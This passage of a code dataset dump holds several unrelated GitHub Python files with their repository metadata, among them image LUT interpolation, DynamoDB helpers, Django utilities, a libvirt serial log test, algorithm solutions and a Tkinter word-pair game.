1))\n\t\tfG = np.reshape(fG, (pixels, 1))\n\t\tfB = np.reshape(fB, (pixels, 1))\n\t\tfR = np.tile(fR, 3)\n\t\tfG = np.tile(fG, 3)\n\t\tfB = np.tile(fB, 3)\n\t\tW000 = (1-fR)*(1-fG)*(1-fB)\n\t\tW001 = (1-fR)*(1-fG)*fB\n\t\tW010 = (1-fR)*fG*(1-fB)\n\t\tW011 = (1-fR)*fG*fB\n\t\tW100 = fR*(1-fG)*(1-fB)\n\t\tW101 = fR*(1-fG)*fB\n\t\tW110 = fR*fG*(1-fB)\n\t\tW111 = fR*fG*fB\n\t\toutPixels = V000*W000 + V001*W001 + V010*W010 + V011*W011 + V100*W100 + V101*W101 + V110*W110 + V111*W111\n\t\toutPixels = np.reshape(outPixels, theShape) * 255 * max_cv\n\n\tif interp_type == 'tetrahedral':\n\n\t\tn = lattice.shape[0] - 1\n\t\tinPixels = np.asarray(inPixels) / max_cv\n\t\ttheShape = inPixels.shape\n\t\tinPixels = np.ravel(inPixels)\n\t\tpixels = inPixels.size/3\n\t\tinPixels = np.reshape(inPixels, (pixels, 3))\n\t\tR, G, B = tsplit(inPixels)\n\t\trLow = np.floor(R*n).astype(np.int_)\n\t\trHigh = np.clip(rLow + 1, 0, n)\n\t\tgLow = np.floor(G*n).astype(np.int_)\n\t\tgHigh = np.clip(gLow + 1, 0, n)\n\t\tbLow = np.floor(B*n).astype(np.int_)\n\t\tbHigh = np.clip(bLow + 1, 0, n)\n\t\tV000 = lattice[rLow, gLow, bLow]\n\t\tV001 = lattice[rLow, gLow, bHigh]\n\t\tV010 = lattice[rLow, gHigh, bLow]\n\t\tV011 = lattice[rLow, gHigh, bHigh]\n\t\tV100 = lattice[rHigh, gLow, bLow]\n\t\tV101 = lattice[rHigh, gLow, bHigh]\n\t\tV110 = lattice[rHigh, gHigh, bLow]\n\t\tV111 = lattice[rHigh, gHigh, bHigh]\n\t\tfR = n*R - rLow\n\t\tfG = n*G - gLow\n\t\tfB = n*B - bLow\n\t\tfR = np.reshape(fR, (pixels, 1))\n\t\tfG = np.reshape(fG, (pixels, 1))\n\t\tfB = np.reshape(fB, (pixels, 1))\n\n\t\toutPixels = (1-fG)*V000 + (fG-fR)*V010 + (fR-fB)*V110 + fB*V111\n\t\toutPixels = np.where(np.logical_and(fR>fG, fG>fB), (1-fR)*V000 + (fR-fG)*V100 + (fG-fB)*V110 + fB*V111, outPixels)\n\t\toutPixels = np.where(np.logical_and(fR>fG, fR>fB), (1-fR)*V000 + (fR-fB)*V100 + (fB-fG)*V101 + fG*V111, outPixels)\n\t\toutPixels = np.where(np.logical_and(fR>fG, fB>=fR), (1-fB)*V000 + (fB-fR)*V001 + (fR-fG)*V101 + fG*V111, outPixels)\n\t\toutPixels = np.where(np.logical_and(fG>=fR, fB>fG), (1-fB)*V000 + (fB-fG)*V001 + (fG-fR)*V011 + fR*V111, outPixels)\n\t\toutPixels = np.where(np.logical_and(fG>=fR, fB>fR), (1-fG)*V000 + (fG-fB)*V010 + (fB-fR)*V011 + fR*V111, outPixels)\n\t\toutPixels = np.clip(outPixels, 0., np.inf)\n\n\t\toutPixels = np.reshape(outPixels, theShape) * 255 * max_cv\n # return outPixels\n\n\t# print(outPixels)\n\tcv2.imwrite('test_tetrahedral.tiff', outPixels.astype(np.uint8))\n\n\treturn outPixels\n\n\nif __name__ == '__main__':\n\n\t# im = '/Users/oscar/Desktop/Emily/aces_app/test.tiff'\n\tim = '/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/create3DLUT/sample_images/aces.0144.exr'\n\t# im = '/Users/oscar/Desktop/Emily/aces_app/BatteryPark_aces.exr'\n\t# im_type = 'tiff'\n\tim_type = 'exr'\n\tlut_file = '/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/create3DLUT/test.cube'\n\tlut_size = 65\n\n\tdst = lut_interpolation(im, im_type, lut_file, lut_size, 'tetrahedral')\n\n\n\n\n\n","repo_name":"alijalalkamali/ACES","sub_path":"lut_interpolation.py","file_name":"lut_interpolation.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"23815037087","text":"import boto3\nimport os\n\ndynamodb = boto3.resource('dynamodb')\ntable = dynamodb.Table(os.environ[\"SITE_TABLE_NAME\"])\n\n\ndef put_site(site):\n \"\"\"\n :param dict site:{\"name\": \"foo.com\", \"url\": \"https://foo.com\"}\n Put Site Data in DynamoDB\n \"\"\"\n table.put_item(Item=site)\n\n\ndef get_sites():\n \"\"\"\n Get ALL Site Data in DynamoDB\n \"\"\"\n response = table.scan()\n return response[\"Items\"]\n\n\ndef remove_site(uuid):\n \"\"\"\n Remove Site Data in DynamoDB\n \"\"\"\n table.delete_item(Key={\"id\": uuid})\n\n\ndef update_site(uuid, new_code):\n \"\"\"\n Update Site Data\n \"\"\"\n table.update_item(\n Key={\n 'id': uuid,\n },\n UpdateExpression='SET code = :val1',\n ExpressionAttributeValues={\n ':val1': new_code\n }\n )\n","repo_name":"nkchan/sls-py-monitor-v2","sub_path":"sls-dir/lib/dynamo.py","file_name":"dynamo.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9258839214","text":"import logging\nlog = logging.getLogger('system')\n\n\ndef Test(req,do_list):\n '''\n :param req: request\n :param do_list: 操作列表\n :return: 返回dict\n 此函数只对检测登录权限的视图函数使用\n '''\n\n try:\n dic = {\n 'do': req.POST['do'],\n 'user_id': req.session['user_id']\n }\n print(dic,list(do_list.keys()))\n if dic['do'] not in list(do_list.keys()):\n\n log.error(\"do 错误\", 'error')\n\n return {\n 'status': False,\n 'error': 'do 错误'\n }\n\n except Exception as E:\n\n log.error(\"没有do,不知道如何操作\")\n\n return {\n 'status': False,\n 'error': '没有do,不知道如何操作'\n }\n\n try:\n\n for keys in do_list[dic['do']]:\n\n dic[keys] = req.POST[keys]\n\n except Exception as E:\n\n log.error('POST信息不完整')\n\n return {\n 'status': False,\n 'error': 'POST信息不完整'\n }\n\n\n return {\n 'status': True,\n 'dic': dic\n }","repo_name":"HuangeHei/ErgouBlog","sub_path":"blog/helper/test_do.py","file_name":"test_do.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8247119385","text":"from django import forms\n\nfrom fluent_contents.forms.widgets import PlaceholderFieldWidget\n\n\nclass PlaceholderFormField(forms.Field):\n \"\"\"\n The internal form field to display a placeholder field.\n It displays the :class:`~fluent_dashboard.forms.PlaceholderFieldWidget`.\n \"\"\"\n\n def __init__(self, slot, plugins=None, parent_object=None, **kwargs):\n # Pass along...\n self.slot = slot\n self._plugins = plugins\n\n defaults = {\n \"widget\": PlaceholderFieldWidget(\n slot=slot, plugins=plugins, parent_object=parent_object\n )\n }\n defaults.update(kwargs)\n super().__init__(**defaults)\n","repo_name":"django-fluent/django-fluent-contents","sub_path":"fluent_contents/forms/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"69"}
+{"seq_id":"37086657813","text":"from __future__ import print_function\nfrom builtins import object\nimport sys\nimport argparse\n\nfrom vnc_api.vnc_api import *\n\nclass Provisioner(object):\n def __init__(self, arguments):\n self._client = VncApi(api_server_host=arguments.api_server,\n api_server_port=arguments.port)\n self._network_name = arguments.network\n self._project = arguments.project\n self._subnet = arguments.subnet\n\n def virtual_machine_lookup(self, vm_name):\n fq_name = [vm_name]\n try:\n vm_instance = self._client.virtual_machine_read(fq_name = fq_name)\n return vm_instance\n except NoIdError:\n pass\n return None\n\n def virtual_machine_locate(self, vm_name):\n fq_name = [vm_name]\n try:\n vm_instance = self._client.virtual_machine_read(fq_name = fq_name)\n return vm_instance\n except NoIdError:\n pass\n\n vm_instance = VirtualMachine(vm_name)\n self._client.virtual_machine_create(vm_instance)\n return vm_instance\n\n def virtual_machine_delete(self, vm_instance):\n self._client.virtual_machine_delete(id = vm_instance.uuid)\n\n def _virtual_network_locate(self):\n fq_name = self._network_name.split(':')\n try:\n vnet = self._client.virtual_network_read(fq_name = fq_name)\n return vnet\n except NoIdError:\n pass\n\n if not self._subnet:\n print(\"%s does not exist\" % self._network_name)\n print(\"Please specify a subnet IP address in order to create virtual-network\")\n return None\n\n vnet = VirtualNetwork(fq_name[-1], parent_type = 'project',\n fq_name = fq_name)\n\n ipam = self._client.network_ipam_read(\n fq_name = ['default-domain',\n 'default-project',\n 'default-network-ipam'])\n\n (prefix, plen) = self._subnet.split('/')\n subnet = IpamSubnetType(subnet = SubnetType(prefix, int(plen)))\n vnet.add_network_ipam(ipam, VnSubnetsType([subnet]))\n\n self._client.virtual_network_create(vnet)\n return vnet\n\n def vmi_update(self, vm_instance):\n fq_name = vm_instance.fq_name\n fq_name.append('0')\n create = False\n try:\n vmi = self._client.virtual_machine_interface_read(fq_name = fq_name)\n except NoIdError:\n vmi = VirtualMachineInterface(parent_type = 'virtual-machine',\n fq_name = fq_name)\n create = True\n\n vnet = self._virtual_network_locate()\n if not vnet:\n sys.exit(1)\n\n vmi.set_virtual_network(vnet)\n if create:\n self._client.virtual_machine_interface_create(vmi)\n else:\n self._client.virtual_machine_interface_update(vmi)\n\n ips = vmi.get_instance_ip_back_refs()\n if ips and len(ips):\n uuid = ips[0]['uuid']\n else:\n ip = InstanceIp(vm_instance.name + '.0')\n ip.set_virtual_machine_interface(vmi)\n ip.set_virtual_network(vnet)\n uuid = self._client.instance_ip_create(ip)\n\n ip = self._client.instance_ip_read(id=uuid)\n\n print(\"IP address: %s\" % ip.get_instance_ip_address())\n return vmi\n\n def vmi_clean(self, vm_instance):\n fq_name = vm_instance.fq_name\n fq_name.append('0')\n try:\n vmi = self._client.virtual_machine_interface_read(fq_name = fq_name)\n except NoIdError:\n return\n\n ips = vmi.get_instance_ip_back_refs()\n for ref in ips:\n self._client.instance_ip_delete(id = ref['uuid'])\n\n self._client.virtual_machine_interface_delete(id = vmi.uuid)\n\ndef instance_config(instance_name, arguments):\n provisioner = Provisioner(arguments)\n vm_instance = provisioner.virtual_machine_locate(instance_name)\n provisioner.vmi_update(vm_instance)\n\ndef instance_unconfig(instance_name, arguments):\n provisioner = Provisioner(arguments)\n vm_instance = provisioner.virtual_machine_lookup(instance_name)\n if vm_instance:\n provisioner.vmi_clean(vm_instance)\n provisioner.virtual_machine_delete(vm_instance)\n\ndef main(argv):\n parser = argparse.ArgumentParser()\n defaults = {\n 'api-server': '127.0.0.1',\n 'port': '8082',\n 'network': 'default-domain:default-project:default-network',\n 'project': 'default-domain:default-project'\n }\n parser.set_defaults(**defaults)\n parser.add_argument(\n \"-s\", \"--api-server\", help=\"API server address\")\n parser.add_argument(\n \"-p\", \"--port\", help=\"API server port\")\n parser.add_argument(\n \"-n\", \"--network\", help=\"Virtual-network\")\n parser.add_argument(\n \"--subnet\", help=\"IP subnet address for the virtual-network\")\n parser.add_argument(\n \"--project\", help=\"OpenStack project name\")\n parser.add_argument(\n \"--add\", action=\"store_true\", help=\"Add instance\")\n parser.add_argument(\n \"--delete\", action=\"store_true\", help=\"Delete instance\")\n parser.add_argument(\n \"instance\", help=\"Instance name\")\n arguments = parser.parse_args(argv)\n if arguments.add:\n instance_config(arguments.instance, arguments)\n elif arguments.delete:\n instance_unconfig(arguments.instance, arguments)\n else:\n print(\"Please specify one of --add or --delete\")\n sys.exit(1)\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"tungstenfabric/tf-controller","sub_path":"src/config/api-server/vnc_cfg_api_server/tests/test_instance_ctl.py","file_name":"test_instance_ctl.py","file_ext":"py","file_size_in_byte":5561,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"69"}
+{"seq_id":"9767098514","text":"import os\nimport sys\nimport time\nimport numpy as np\nimport argparse\nimport logging\n\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\nfrom SAOCatalog import load_SAOCatalog_binary\n\nif __name__ == '__main__':\n logging.basicConfig(filename='saocatalog_exclude_stars.log',\n filemode='w',\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n # add to screen as well\n log = logging.getLogger()\n formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s')\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(formatter)\n log.addHandler(ch)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('cat', type=str, help='Catalog to process')\n parser.add_argument('--excluderad', type=float, default=0.15,\n help='Exclusion radius in degrees')\n args = parser.parse_args()\n\n logging.info(f'args = {args}')\n\n # see if exclusion list already exists so we don't overwrite\n if os.path.isfile('sao_exclude_lst.dat'):\n logging.error('The file sao_exclude_lst.dat already exists!')\n logging.error('Move it out of the way before running this command or')\n sys.exit(1)\n\n saocat = load_SAOCatalog_binary(args.cat)\n logging.info(f'Loaded {len(saocat.id)} stars')\n\n near_search_rad = 1\n exclusion_rad = 0.15\n exclude_list = []\n ts = time.time()\n ndone = 0\n for cat_idx in range(0, len(saocat.id)):\n logging.debug(f'Evaluating cat index={cat_idx} '\n f'SAO={saocat.id[cat_idx]:>8d}')\n #logging.info(\"CatIdx SAO RA.DEC (J2000) VMag\")\n\n radec = SkyCoord(saocat.ra[cat_idx], saocat.dec[cat_idx],\n unit=u.deg, frame='fk5', equinox='J2000')\n logging.info(f\"{cat_idx} {saocat.id[cat_idx]:>8d} \"\n f\"{radec.to_string('hmsdms', sep=':', precision=3):30s} \"\n f\"{saocat.vmag[cat_idx]:4.2f}\")\n\n # look within 1 degree for other stars - set maxmag so all brighter\n # stars considered and minmag to 2 mags fainter\n cand_idx_2, cand_dist_2 = saocat.find_stars_near_target(radec,\n near_search_rad,\n 999, -999,\n exclude=[cat_idx])\n if len(cand_idx_2) > 0:\n # figure out closest\n closest_idx = np.argmin(cand_dist_2)\n closest_deg = np.rad2deg(np.min(cand_dist_2))\n logging.info(f\" nstars={len(cand_idx_2)} closest={closest_deg} deg\")\n if closest_deg <= exclusion_rad:\n exclude_list.append(cat_idx)\n\n ndone += 1\n if (ndone % 100) == 0:\n logging.info(f'{ndone} of {len(saocat.id)} complete')\n\n te = time.time()\n logging.info(f'Excluded {len(exclude_list)} stars in {te-ts:6.2f} seconds')\n f = open('sao_exclude_lst.dat', 'w')\n for exclude_idx in exclude_list:\n f.write(f'{exclude_idx}, {saocat.id[exclude_idx]}\\n')\n f.close()\n\n sys.exit(0)\n","repo_name":"PythonAstroimagingSuite/hfdfocus","sub_path":"find_star/saocatalog_exclude_stars.py","file_name":"saocatalog_exclude_stars.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71627415579","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution:\n def smallestFromLeaf(self, root):\n self.ans = '{}'\n\n def dfs(root, path):\n if not root:\n return\n if not root.left and not root.right:\n self.ans = min(self.ans, chr(root.val + 97) + path)\n dfs(root.left, chr(root.val + 97) + path)\n dfs(root.right, chr(root.val + 97) + path)\n\n dfs(root, '')\n return self.ans\n\n\nclass Solution3:\n def smallestFromLeaf(self, root):\n self.strings = []\n def dfs(node, s):\n if not node:\n return\n if not node.left and not node.right:\n self.strings.append(chr(97 + node.val) + s)\n\n dfs(node.left, chr(97 + node.val) + s)\n dfs(node.right, chr(97 + node.val) + s)\n\n dfs(root, \"\")\n return min(self.strings)\n","repo_name":"DustinKLo/practice_problems","sub_path":"leetcode/q988_smallest_string_starting_from_leaf.py","file_name":"q988_smallest_string_starting_from_leaf.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29812402913","text":"import sys\n\ninput = sys.stdin.readline\n\n\n# 1633 최고의 팀 만들기\n# 각 선수들의 백 능력치와 흑 능력치가 주어지고\n# 그 중 15명의 백 선수와 15명의 흑 선수 총 30명의 선수를 뽑아\n# 흑백 능력치의 합이 최대가 되는 팀을 만들 때, 그 팀의 능력치의 합을 구하는 문제\ndef sol1633():\n players = []\n while True:\n inp = list(map(int, input().split()))\n if not inp:\n break\n players.append(inp)\n n = len(players)\n\n dp = [[[0] * 16 for _ in range(16)] for _ in range(n)]\n\n def dfs(cur, cw, cb):\n if cur == n:\n return 0\n\n if not dp[cur][cw][cb]:\n res = 0\n\n need = 30 - cw - cb\n if n - cur - need > 0:\n res = max(res, dfs(cur + 1, cw, cb))\n\n if cw < 15:\n res = max(res, dfs(cur + 1, cw + 1, cb) + players[cur][0])\n\n if cb < 15:\n res = max(res, dfs(cur + 1, cw, cb + 1) + players[cur][1])\n dp[cur][cw][cb] = res\n\n return dp[cur][cw][cb]\n\n return dfs(0, 0, 0)\n","repo_name":"Scalas/PS_BaekJoon","sub_path":"solutions/sol1633.py","file_name":"sol1633.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18210392569","text":"from hug.middleware import LogMiddleware\nfrom datetime import datetime\nfrom timeit import default_timer\n\nclass CLALogMiddleware(LogMiddleware):\n \"\"\"CLA log middleware\"\"\"\n\n def __init__(self, logger=None):\n super().__init__(logger=logger)\n self.elapsed_time = 0\n self.start_time = None\n self.end_time = None\n\n def process_request(self, request, response):\n \"\"\"Logs CLA request \"\"\"\n self.logger.info(f'BEGIN {request.method} {request.path}')\n self.start_time = datetime.utcnow()\n super().process_request(request, response)\n \n def process_response(self, request, response, resource, req_succeeded):\n \"\"\"Logs data returned by CLA API \"\"\"\n if self.start_time:\n self.elapsed_time = datetime.utcnow() - self.start_time\n super().process_response(request, response, resource, req_succeeded)\n self.logger.info(f'END {request.method} {request.path} - elapsed_time : {self.elapsed_time.seconds} secs')\n\n","repo_name":"communitybridge/easycla","sub_path":"cla-backend/cla/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"69"}
+{"seq_id":"35540728332","text":"from tkinter import *\nimport WordpairsBack\nfrom time import time\nimport random\n\nclass Game :\n\n def __init__(self, name, level, list):\n self.name = name\n self.level = level\n self.list = list\n \n def intro(self) :\n welcome_statement = str(f\"Welcome {self.name}, you are on level {self.level}, with each level you will be shown an increasing number of word pairs for a period of time. You must enter all the corresponding word pairs to move on to the next level. Press hide and begin when you have remembered the wordpairs in the left box\")\n format_dialogue(welcome_statement)\n \n def intro_new_level(self) :\n intro_statement = str(f\"Well done {self.name}! You completed level {self.level}! You are now on level {(self.level + 1)}. Some words have been added to your list, press hide and begin when you are ready.\")\n format_dialogue(intro_statement)\n \n def level_up(self) :\n self.level += 1\n b_hide.configure(state = NORMAL)\n b_check.configure(state = DISABLED)\n return self.level\n\n def game_over(self) :\n game_over_statement = str(f\"That was not the correct pair, you've failed. The correct pairing was {this_level.current_pair[0]} and {this_level.current_pair[2]}. However you reached level {self.level} and your score has been added to the Highscore board.\")\n format_dialogue(game_over_statement)\n WordpairsBack.add_to_highscore(self.name, self.level)\n b_hide.configure(state = DISABLED)\n b_check.configure(state= DISABLED)\n\n\n\nclass Level :\n\n def __init__(self, level, c_answers, t_answers, pairs, current_pair = \"\"):\n self.level = level\n self.c_answers = c_answers\n self.t_answers = t_answers\n self.pairs = pairs\n self.current_pair = current_pair\n\n def get_question(self) :\n try : \n this_pair = random.choice(self.pairs)\n self.pairs.remove(this_pair)\n self.current_pair = this_pair\n except IndexError :\n print(\"level complete\")\n \n def correct_answer(self) :\n self.c_answers += 1\n \n \n def correct_answer_statement(self):\n format_dialogue(f\"That answer was correct! You are {self.c_answers}/{self.t_answers} of the way through this level\")\n\n\n \n\n \ndef format_dialogue(string) : \n list_dialogue.delete(0, END)\n split_string = string.split()\n max = len(split_string)\n a = 0\n b = 8\n f_dialogue = []\n while b <= max :\n f_dialogue.append(split_string[a : b])\n a +=8\n b +=8\n else: \n f_dialogue.append(split_string[(a) : ])\n ff_dialogue = []\n for rows in f_dialogue :\n ff_dialogue.append(\" \".join(rows))\n for rows in ff_dialogue :\n list_dialogue.insert(END, rows)\n return (ff_dialogue)\n \n\n\n\ndef start_game () : \n if not name_entry.get() :\n format_dialogue(\"You need to enter a username to begin\")\n \n else :\n wordpairs_list = WordpairsBack.create_list() \n name = name_entry.get() #Set's Game\n level = 1\n list = (wordpairs_list)\n global user\n user = Game(name, level, list)\n user.intro()\n\n list_wordpairs.delete(0, END) #Creates and prints list\n for wordpairs in wordpairs_list[0:user.level] :\n list_wordpairs.insert(END, wordpairs)\n disable_sandh()\n b_hide.configure(state = NORMAL)\n\n\n \ndef ent_control(event) :\n state_c = str(b_check['state'])\n state_s = str(b_start['state'])\n state_h = str(b_hide['state'])\n if state_c == 'normal' :\n check_entry()\n elif state_s == 'normal' :\n start_game()\n elif state_h == 'normal' :\n begin_level()\n else :\n pass\n\n\n\n\ndef check_entry() :\n global this_level\n list_dialogue.delete(0, END)\n if not list_wordpairs.get(0, END) :\n answer = pf_answer.get()\n if answer == this_level.current_pair[2] : #this needs to be taken from list not this pair os function is cyclable\n this_level.correct_answer()\n list_given_word.delete(0, END)\n e_answer.delete(0, END)\n if this_level.c_answers < this_level.t_answers :\n this_level.correct_answer_statement()\n this_level.get_question()\n list_given_word.insert(END, this_level.current_pair[0])\n else :\n user.intro_new_level()\n user.level_up()\n list_wordpairs.delete(0, END) #Creates and prints list\n for word_pairs in user.list[0 : user.level] :\n list_wordpairs.insert(END, word_pairs)\n else : \n user.game_over()\n enable_sandh()\n else : \n format_dialogue(\"You need to press hide and begin before you can enter the pair. No cheating\")\n pass\n\n\n\ndef begin_level():\n list_given_word.delete(0, END)\n list_wordpairs.delete(0, END)\n global this_level\n this_level = Level(user.level, 0, user.level, user.list[0:user.level])\n this_level.get_question()\n list_given_word.insert(END, this_level.current_pair[0])\n b_check.configure(state = NORMAL)\n b_hide.configure(state = DISABLED)\n\n\n\ndef check_highscore():\n highscores = WordpairsBack.check_highscore()\n list_wordpairs.delete(0, END)\n for scores in highscores :\n list_wordpairs.insert(END, scores)\n\n\ndef disable_sandh() :\n b_start.configure(state = DISABLED)\n b_highscore.configure(state = DISABLED)\n\ndef enable_sandh() :\n b_start.configure(state = NORMAL)\n b_highscore.configure(state = NORMAL)\n \nwindow = Tk()\n\nwindow.wm_title(\"WordPairs\")\n\n\n\nb_start = Button(window, text = \"Start\", width = 12, command = start_game)\nb_start.grid(row = 1, column = 2)\nb_start.configure(state = NORMAL)\n\nb_highscore = Button(window, text = \"Highscores\", width = 12, command = check_highscore)\nb_highscore.grid(row = 1, column = 1)\nb_highscore.configure(state = NORMAL)\n\nb_check = Button(window, text = \"Check Entry\", width = 40, command = check_entry)\nb_check.grid(row = 5 , column = 1, columnspan = 2)\nb_check.configure(state= DISABLED)\n\nb_hide = Button(window, text = \"Hide and Begin\", width = 40, command = begin_level)\nb_hide.grid(row = 7, column = 0, padx = 15, pady= 20)\nb_hide.configure(state = DISABLED)\n\nl_name = Label(window, text = \"Enter your name: \")\nl_name.grid( row = 0, column = 1)\n\nl_word = Label(window, text = \"Given word\")\nl_word.grid(row = 3, column = 1)\n\nl_entry = Label(window, text = \"Enter pair\")\nl_entry.grid(row = 3, column = 2)\n\nlist_dialogue = Listbox(window, height = 7, width = 40)\nlist_dialogue.grid(row = 2, column = 1, rowspan = 1, columnspan = 2, padx= 15)\n\nlist_wordpairs = Listbox(window, height = 20, width = 40)\nlist_wordpairs.grid(row = 0, column = 0, rowspan = 6, pady = 15, padx =15, ipady = 15, ipadx = 15)\n\nlist_given_word = Listbox(window, height = 1, width = 20)\nlist_given_word.grid(row = 4, column = 1)\n\n\nname_entry = StringVar()\ne_name = Entry(window, textvariable = name_entry)\ne_name.grid(row = 0, column = 2)\n\n\npf_answer = StringVar()\ne_answer = Entry(window, textvariable = pf_answer)\ne_answer.grid(row = 4, column = 2)\n\nwindow.bind('', ent_control)\n\n\n\nwindow.mainloop()\n\n\n","repo_name":"Jordanw95/WordPairs","sub_path":"WordpairsFront.py","file_name":"WordpairsFront.py","file_ext":"py","file_size_in_byte":7333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7531713890","text":"import json\nfrom .languageData import languageData\n\n\nclass LanguageResult:\n def __init__(self, results=None, num_ngrams=None):\n self.language = (languageData.lang_codes[results[0][0]] if results else None)\n self.__results = results\n self.__num_ngrams = num_ngrams\n\n def __str__(self):\n return json.dumps({'': {\n 'language': self.language,\n 'scores()': self.scores(),\n 'is_reliable()': self.is_reliable()\n }\n })\n\n def scores(self):\n return _get_scores(self.__results)\n\n def is_reliable(self):\n if not self.language or self.__num_ngrams < 3 or not self.__results:\n return False\n next_score = (self.__results[1][1] if len(self.__results) > 1 else 0)\n # A minimum of a 24% from the average score\n if languageData.avg_score[self.language] * 0.24 > (self.__results[0][1] / self.__num_ngrams) \\\n or 0.01 > abs(self.__results[0][1] - next_score):\n return False\n return True\n\n\ndef _get_scores(results):\n scores = {}\n if results:\n for value in results:\n scores[languageData.lang_codes[value[0]]] = value[1]\n return scores\n","repo_name":"nitotm/efficient-language-detector-py","sub_path":"eld/languageResult.py","file_name":"languageResult.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"69"}
+{"seq_id":"30436114439","text":"import logging as log\n\nfrom virttest import libvirt_xml\nfrom virttest import utils_config\nfrom virttest import utils_libvirtd\nfrom virttest import utils_misc\nfrom virttest import virsh\n\nfrom virttest.utils_test import libvirt\nfrom virttest.libvirt_xml.devices.serial import Serial\n\n\n# Using as lower capital is not the best way to do, but this is just a\n# workaround to avoid changing the entire file.\nlogging = log.getLogger('avocado.' + __name__)\n\n\ndef check_pty_log_file(file_path, boot_prompt):\n \"\"\"\n Check if pty log file has vm boot up logs\n\n :param file_path: the pty log file path\n :param boot_prompt: the expected login prompt\n :return: True or False according the result of finding\n \"\"\"\n\n with open(file_path, errors='ignore') as fp:\n contents = fp.read()\n logging.debug(\"The contents of log file are : %s\" % contents)\n ret = contents.find(boot_prompt)\n if ret == -1:\n return False\n return True\n\n\ndef run(test, params, env):\n \"\"\"\n Test pty type serial with log file\n \"\"\"\n\n def prepare_serial_device():\n \"\"\"\n Prepare a serial device XML according to parameters\n\n :return: the serial device xml object\n \"\"\"\n serial = Serial(serial_type)\n\n serial.target_port = target_port\n serial.target_type = target_type\n serial.target_model = target_model\n serial.log_file = log_file\n\n return serial\n\n def update_qemu_conf():\n \"\"\"\n update some settings in qemu conf file\n \"\"\"\n qemu_conf.stdio_handler = stdio_handler\n daemon_service.restart()\n\n remove_devices = eval(params.get('remove_devices', []))\n target_model = params.get('target_model', '')\n serial_type = params.get('serial_dev_type', 'pty')\n log_file = params.get('log_file', '')\n target_type = params.get('target_type', 'isa-serial')\n target_port = params.get('target_port', '0')\n target_model = params.get('target_model', '')\n stdio_handler = params.get('stdio_handler', \"logd\")\n boot_prompt = params.get('boot_prompt', 'Login Prompts')\n vm_name = params.get(\"main_vm\")\n\n qemu_conf = utils_config.get_conf_obj(\"qemu\")\n daemon_service = utils_libvirtd.Libvirtd()\n\n update_qemu_conf()\n\n backup_xml = libvirt_xml.VMXML.new_from_dumpxml(vm_name)\n\n try:\n vmxml = backup_xml.copy()\n vm = env.get_vm(vm_name)\n vm.undefine()\n\n for device_type in remove_devices:\n vmxml.remove_all_device_by_type(device_type)\n serial_dev = prepare_serial_device()\n vmxml.add_device(serial_dev)\n vmxml.sync()\n logging.debug(\"vmxml: %s\" % vmxml)\n\n ret = virsh.define(vmxml.xml, debug=True)\n libvirt.check_exit_status(ret)\n virsh.start(vm_name, ignore_status=False)\n vm.wait_for_login().close()\n\n # Need to wait for a while to get login prompt\n if not utils_misc.wait_for(\n lambda: check_pty_log_file(log_file, boot_prompt), 6):\n test.fail(\"Failed to find the vm login prompt from %s\" % log_file)\n\n except Exception as e:\n test.error('Unexpected error: {}'.format(e))\n finally:\n vm.destroy()\n backup_xml.sync()\n qemu_conf.restore()\n daemon_service.restart()\n","repo_name":"autotest/tp-libvirt","sub_path":"libvirt/tests/src/serial/serial_pty_log.py","file_name":"serial_pty_log.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"69"}
+{"seq_id":"72027573019","text":"import cProfile\nimport pstats\n\nclass ProfiledTest(object):\n def setUp(self):\n '''Start before any tests'''\n super(ProfiledTest, self).setUp()\n self.profiler = cProfile.Profile()\n self.profiler.enable()\n print(\"\\n<<<---\")\n\n def tearDown(self):\n \"\"\"Finish after any test\"\"\"\n super(ProfiledTest, self).tearDown()\n stats = pstats.Stats(self.profiler)\n stats.strip_dirs()\n stats.sort_stats('cumtime')\n stats.print_stats()\n print(\"\\n--->>>\")\n\n","repo_name":"e0ne/profiled_test","sub_path":"profiled_test.py","file_name":"profiled_test.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
